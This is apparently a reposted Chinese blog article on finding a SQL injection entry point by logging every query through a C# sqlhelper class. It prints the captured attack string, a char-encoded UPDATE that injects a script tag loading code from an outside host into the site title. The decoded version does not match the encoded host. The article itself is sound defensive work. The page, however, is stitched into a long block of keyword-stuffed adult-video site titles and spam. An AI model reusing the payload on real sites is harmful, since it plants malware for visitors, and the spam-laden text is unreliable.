婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av

主頁 > 知識庫 > 記一次成功的sql注入入侵檢測附帶sql性能優化

記一次成功的sql注入入侵檢測附帶sql性能優化

熱門標簽:陜西電銷外呼系統好用嗎 蘭州語音外呼系統運營商 銀川高頻外呼回撥系統多少錢 最新人工智能電銷機器人 數字匠心電銷機器人 成都電話外呼系統一般多少錢 沒聽見電話機器人幫你接 al智能電話機器人 如何做地圖標注圖鋪
但是如果是讓你接手一個二等殘廢的網站,并讓你在上面改版,而且不能推翻式改版,只能逐步替換舊的程序,那么你會非常痛苦,例如我遇到的問題:
問題1.
老板對你說,以前剛做完網站好好了,沒有出現木馬,怎么你來了,就會出現木馬,先別說了,趕緊解決問題,我徹底無語,但是如果爭吵,其實證明你和老板一樣無知,拿出證據和事實分析來讓公司其他稍微懂技術的一起來證明,公司網站被掛馬不是你來了的錯。
如是我通過網站目錄仔細排查將通過fck上傳的網馬刪除并修補fck的上傳漏洞并記下了這篇 Fckeditor使用筆記 ,其實很多人都遇到過,也解決過,都是小問題,但是讓你老板明白比解決漏洞問題更蛋疼,我那解釋的叫一個汗啊,恨不得把公司所有稍微懂點技術的都叫上讓他們看什么是大馬什么是小馬,然后演示怎么上傳木馬,奶奶的,黑客教程普及啊。
問題2.
網站又出現問題,上次的問題解決了不過兩個月,網站又被入侵掛馬,如是老板這次再說因為我來了才出問題,立馬走人,這就是為什么不能更不懂技術的人硬碰硬,更不能和你的老板來說,說了你又不懂。
但是要命的是網站是以前的技術開發的二等殘廢,在別個的cms上修改的,我必須保證網站在的開發的同時舊的模塊還可以使用,通過逐步更新的方法將網站底層翻新,但是那么多頁面,你很難一個一個去檢測那個頁面有漏洞,如是寫出下面的檢測代碼,沒想到這么簡單的就搞定了,并且可以通過此方法優化你的sql。
第一步建立一個sql日志表
復制代碼 代碼如下:

CREATE TABLE [dbo].[my_sqllog](
[id] [bigint] IDENTITY(1,1) NOT NULL,
[hit] [bigint] NULL,
[sqltext] [varchar](max) COLLATE Chinese_PRC_CI_AS NULL,
[paramdetails] [varchar](max) COLLATE Chinese_PRC_CI_AS NULL,
[begintime] [datetime] NULL,
[endtime] [datetime] NULL,
[fromurl] [varchar](max) COLLATE Chinese_PRC_CI_AS NULL,
[ip] [varchar](20) COLLATE Chinese_PRC_CI_AS NULL,
[lastelapsedtime] [bigint] NULL,
CONSTRAINT [PK_my_sqllog] PRIMARY KEY CLUSTERED
(
[id] ASC
)WITH (IGNORE_DUP_KEY = OFF) ON [PRIMARY]
) ON [PRIMARY]

記錄sql語句、此sql語句被執行次數,參數及值,記錄開始時間,結束時間,來自哪個頁面,ip和此條語句執行時間(暫時沒用)
第二步在sqlhelper里寫記錄代碼
兩個方法本來可以寫成private的,但是此二等殘廢的網站其他地方用的別的sqlhelper類,就直接調用此處通過合理優化的sqlhelper類的方法了。
代碼1:插入日志
復制代碼 代碼如下:

public static int ExecuteSqlLog(CommandType commandType, string commandText, params DbParameter[] cmdParams)
{
#region 參數處理
string colums = "";
string dbtypes = "";
string values = "";
string paramdetails = "";
if (cmdParams != null cmdParams.Length > 0)
{
foreach (DbParameter param in cmdParams)
{
if (param == null)
{
continue;
}
colums += param.ParameterName + " ";
dbtypes += param.DbType + " ";
values += param.Value + ";";
}
paramdetails = string.Format(" {0},{1},{2}", colums, dbtypes, values);
}
string fromurl = "";
if (System.Web.HttpContext.Current!=null)
{
fromurl = System.Web.HttpContext.Current.Request.Url.ToString();
}
// commandText = commandText.Replace("'","‘").Replace(";",";");
SqlParameter[] parameters = new SqlParameter[]
{
new SqlParameter("@hit",1),
new SqlParameter("@sqltext",commandText),
new SqlParameter("@paramdetails",paramdetails),
new SqlParameter("@begintime",DateTime.Now),
new SqlParameter("@endtime",DateTime.Now),
new SqlParameter("@fromurl",fromurl),
new SqlParameter("@ip",Web.PressRequest.GetIP()),
new SqlParameter("@lastelapsedtime",0),
};
#endregion
using (DbConnection connection = Factory.CreateConnection())
{
connection.ConnectionString = GetRealConnectionString(commandText);//ConnectionString;
string sql = "";
// 執行DbCommand命令,并返回結果.
int id =
Utils.TypeConverter.ObjectToInt(ExecuteScalarLog(CommandType.Text,
"select top 1 id from my_sqllog where sqltext=@sqltext",
new SqlParameter("@sqltext", commandText)));
if (id > 0)
{
sql = "update my_sqllog set hit=hit+1,ip=@ip,endtime=@endtime,fromurl=@fromurl where id=" + id;
}
else
{
sql = "insert into my_sqllog(hit,sqltext,paramdetails,begintime,endtime,fromurl,ip,lastelapsedtime) values(@hit,@sqltext,@paramdetails,@begintime,@endtime,@fromurl,@ip,@lastelapsedtime)";
}
// 創建DbCommand命令,并進行預處理
DbCommand cmd = Factory.CreateCommand();
bool mustCloseConnection = false;
PrepareCommand(cmd, connection, (DbTransaction)null, commandType, sql, parameters, out mustCloseConnection);
// 執行DbCommand命令,并返回結果.
int retval = cmd.ExecuteNonQuery();
// 清除參數,以便再次使用.
cmd.Parameters.Clear();
if (mustCloseConnection)
connection.Close();
return retval;
}
}

代碼2:判斷此條sql是否存在
復制代碼 代碼如下:

private static object ExecuteScalarLog( CommandType commandType, string commandText, params DbParameter[] commandParameters)
{
if (ConnectionString == null || ConnectionString.Length == 0) throw new ArgumentNullException("ConnectionString");
// 創建并打開數據庫連接對象,操作完成釋放對象.
using (DbConnection connection = Factory.CreateConnection())
{
if (connection == null) throw new ArgumentNullException("connection");
//connection.Close();
connection.ConnectionString = GetRealConnectionString(commandText);
connection.Open();
// 創建DbCommand命令,并進行預處理
DbCommand cmd = Factory.CreateCommand();
bool mustCloseConnection = false;
PrepareCommand(cmd, connection, (DbTransaction)null, commandType, commandText, commandParameters, out mustCloseConnection);
// 執行DbCommand命令,并返回結果.
object retval = cmd.ExecuteScalar();
// 清除參數,以便再次使用.
cmd.Parameters.Clear();
if (mustCloseConnection)
connection.Close();
return retval;
}
}

第三部在你的每個執行sql語句的方法里加入以下代碼,不管是ExecuteScalar、ExecuteReader還是ExecuteNonQuery等等都加上
復制代碼 代碼如下:

//執行sql之前進行日志記錄操縱
int log = ExecuteSqlLog(CommandType.Text, commandText, commandParameters);

代碼示例:
復制代碼 代碼如下:

public static object ExecuteScalar(DbConnection connection, CommandType commandType, string commandText, params DbParameter[] commandParameters)
{
if (connection == null) throw new ArgumentNullException("connection");
//connection.Close();
connection.ConnectionString = GetRealConnectionString(commandText);
connection.Open();
// 創建DbCommand命令,并進行預處理
DbCommand cmd = Factory.CreateCommand();
bool mustCloseConnection = false;
PrepareCommand(cmd, connection, (DbTransaction)null, commandType, commandText, commandParameters, out mustCloseConnection);
//執行sql之前進行日志記錄操縱
int log = ExecuteSqlLog(CommandType.Text, commandText, commandParameters);
// 執行DbCommand命令,并返回結果.
object retval = cmd.ExecuteScalar();
// 清除參數,以便再次使用.
cmd.Parameters.Clear();
if (mustCloseConnection)
connection.Close();
return retval;
}

然后你會發現入侵的入口被記錄下來了,后面方框里的就是構造注入的sql

構造sql如下:

39191+update+my_websetting+set+websitetitle=REPLACE(cast(websitetitle+as+varchar(8000)),cast(char(60)+char(47)+char(116)+char(105)+char(116)+char(108)+char(101)+char(62)+char(60)+char(115)+char(99)+char(114)+char(105)+char(112)+char(116)+char(32)+char(115)+char(114)+char(99)+char(61)+char(104)+char(116)+char(116)+char(112)+char(58)+char(47)+char(47)+char(100)+char(102)+char(114)+char(103)+char(99)+char(99)+char(46)+char(99)+char(111)+char(109)+char(47)+char(117)+char(114)+char(46)+char(112)+char(104)+char(112)+char(62)+char(60)+char(47)+char(115)+char(99)+char(114)+char(105)+char(112)+char(116)+char(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))--
轉碼后變成這樣了:  

update my_websetting set websitetitle=REPLACE(cast(websitetitle as varchar(8000)),websitetitle+'/title>script src=http://jb51.net/ur.php>/script>')
這個就是木馬地址,沒事你就別點了,好奇害死貓。

小結:
既然知道入口就知道怎么補救了吧,把string類型該過濾的都過濾掉,int類型的就得是int類型,別讓數據庫替你隱式轉。通過此sql日志記錄,你應該發現一點那個hit還是有點價值的。
通過select top 100 * from my_sqllog order by hit desc
你會發現你寫的那么多sql原來真垃圾,在條件允許的情況下干嘛不把它放到緩存里。所以后來我寫的sql基本不在這top 100里。
拋磚引玉,望高手批評,以上入侵方法希望剛學習做程序員的同學不要用來欺負小網站,傷不起。
作者:jqbird

標簽:巴彥淖爾 宜春 鹽城 通化 遼源 邢臺 朔州 本溪

巨人網絡通訊聲明:本文標題《記一次成功的sql注入入侵檢測附帶sql性能優化》,本文關鍵詞  記,一次,成功,的,sql,注入,;如發現本文內容存在版權問題,煩請提供相關信息告之我們,我們將及時溝通與處理。本站內容系統采集于網絡,涉及言論、版權與本站無關。
  • 相關文章
  • 下面列出與本文章《記一次成功的sql注入入侵檢測附帶sql性能優化》相關的同類信息!
  • 本頁收集關于記一次成功的sql注入入侵檢測附帶sql性能優化的相關信息資訊供網民參考!
  • 推薦文章
    婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av
    成人精品免费网站| 国产精品久久777777| 《视频一区视频二区| 欧美综合欧美视频| 国产乱子轮精品视频| 国产精品66部| 亚洲日本青草视频在线怡红院| 欧美日韩一级视频| 高清国产一区二区三区| 秋霞成人午夜伦在线观看| 中文字幕视频一区| 日韩一区二区三区视频在线观看| 国产成人aaa| 一区二区三区免费看视频| 欧美电视剧在线看免费| 欧美日韩国产一级二级| av在线播放一区二区三区| 国产老肥熟一区二区三区| 美女视频网站久久| 中文字幕亚洲在| 日本一二三四高清不卡| 久久伊人蜜桃av一区二区| 欧美久久一区二区| 欧美图区在线视频| 欧洲人成人精品| 亚洲精品成人少妇| 亚洲国产精品精华液2区45| 精品理论电影在线观看| 欧美视频一区二区| 欧洲精品视频在线观看| 欧美性三三影院| 欧美老女人第四色| 欧美一卡二卡三卡| 日韩欧美国产1| 久久午夜免费电影| 国产精品女主播av| 亚洲精品五月天| 亚洲图片一区二区| 美国毛片一区二区| 精品一区二区国语对白| 久久蜜桃av一区精品变态类天堂| 日韩欧美一二区| www久久精品| 久久影院电视剧免费观看| 亚洲大片在线观看| 亚洲伊人色欲综合网| 一区二区三区免费| 日韩综合小视频| 麻豆一区二区三区| 成人在线视频首页| 成人av中文字幕| 91黄色小视频| 91麻豆精品国产| 久久综合精品国产一区二区三区 | 日韩电影在线看| 另类人妖一区二区av| 国产在线一区观看| 福利视频网站一区二区三区| 色婷婷精品大视频在线蜜桃视频| 欧美在线你懂得| 91精品国产91综合久久蜜臀| 国产亚洲综合av| 一区二区国产盗摄色噜噜| 麻豆精品一区二区| 色先锋aa成人| 日本一区二区视频在线| 首页亚洲欧美制服丝腿| 丁香婷婷综合五月| 精品久久五月天| 亚洲成a人片在线观看中文| 国产美女精品人人做人人爽| 欧美日本高清视频在线观看| 中文字幕一区二区三中文字幕| 欧美96一区二区免费视频| 91麻豆成人久久精品二区三区| 久久久久国产精品麻豆| 日韩综合小视频| 欧美视频一区二区三区在线观看| 中文字幕在线不卡一区二区三区 | 中文字幕在线视频一区| 日韩高清不卡一区| jizz一区二区| 国产欧美一区二区精品久导航| 视频在线在亚洲| 色噜噜久久综合| 日本欧美大码aⅴ在线播放| 99国产欧美另类久久久精品| 欧美精品日日鲁夜夜添| 91浏览器在线视频| 中文字幕欧美三区| 国内外成人在线| 欧美精品一区二区三区蜜桃| 麻豆国产精品一区二区三区| 欧美精品 国产精品| 亚洲h精品动漫在线观看| 色综合久久88色综合天天免费| 国产亚洲一区字幕| 久久草av在线| 久久久欧美精品sm网站| 日本不卡视频在线观看| 欧美老年两性高潮| 亚洲国产欧美日韩另类综合| 91视频一区二区| 亚洲久本草在线中文字幕| 国产成人综合亚洲91猫咪| 2023国产精华国产精品| 亚洲午夜激情av| 在线播放中文字幕一区| 毛片av中文字幕一区二区| 精品污污网站免费看| 亚洲成av人片在线| 爽爽淫人综合网网站| 日韩欧美国产精品一区| 国产一区高清在线| 欧美一区2区视频在线观看| 另类人妖一区二区av| 7777精品伊人久久久大香线蕉经典版下载 | 亚洲va国产va欧美va观看| 99精品国产视频| 亚洲精品视频观看| 91网站在线播放| 婷婷丁香激情综合| 国产一区二区三区免费看| 久久久国产综合精品女国产盗摄| 欧美专区亚洲专区| 天堂一区二区在线| 久久尤物电影视频在线观看| 日本大胆欧美人术艺术动态| 欧美一二三在线| 蜜桃精品视频在线观看| 国产精品久久久久久久久免费丝袜| 婷婷夜色潮精品综合在线| xnxx国产精品| 欧美日韩在线播放三区| 日本sm残虐另类| 中文字幕一区三区| 欧美色视频一区| 成人永久aaa| 亚洲女子a中天字幕| 日韩欧美成人一区| 一本大道av一区二区在线播放| 午夜影院在线观看欧美| 国产精品污www在线观看| 91在线视频在线| 国产一区二区日韩精品| 国产精品午夜免费| 26uuu久久综合| 国产美女一区二区| 蜜芽一区二区三区| 一区二区三区毛片| 欧美成人三级电影在线| 欧美三级中文字幕| 免费视频一区二区| 洋洋av久久久久久久一区| 欧美精品免费视频| 精品一区二区三区在线视频| 亚洲国产精品二十页| 91久久精品一区二区三区| 麻豆国产一区二区| 欧美极品美女视频| 欧美精品一区二区久久婷婷| 欧美乱妇23p| 不卡一卡二卡三乱码免费网站| 狠狠久久亚洲欧美| 亚洲与欧洲av电影| 一区二区三区在线视频免费| 777a∨成人精品桃花网| 欧美午夜精品免费| 福利一区在线观看| 成人午夜激情片| 成人免费福利片| 韩国av一区二区| 激情av综合网| 一区二区三区日韩精品视频| 亚洲天堂免费看| 国产网站一区二区| 国产精品丝袜91| 欧美日韩亚洲综合| 欧美人狂配大交3d怪物一区 | 久久精品国产在热久久| 最新日韩在线视频| 久久久九九九九| 欧美丝袜丝nylons| 99久久伊人精品| 国产精品一区二区在线观看不卡| 亚洲午夜久久久久久久久久久| 91麻豆精品久久久久蜜臀| 色老汉一区二区三区| 91国内精品野花午夜精品| 国产自产高清不卡| 国产成人综合亚洲网站| 亚洲午夜av在线| 久久精品国产99| 精品亚洲国产成人av制服丝袜| 天天综合天天综合色| 免费成人美女在线观看.| 日韩电影网1区2区| 久久超碰97中文字幕| 日韩国产一区二| 国产真实乱子伦精品视频|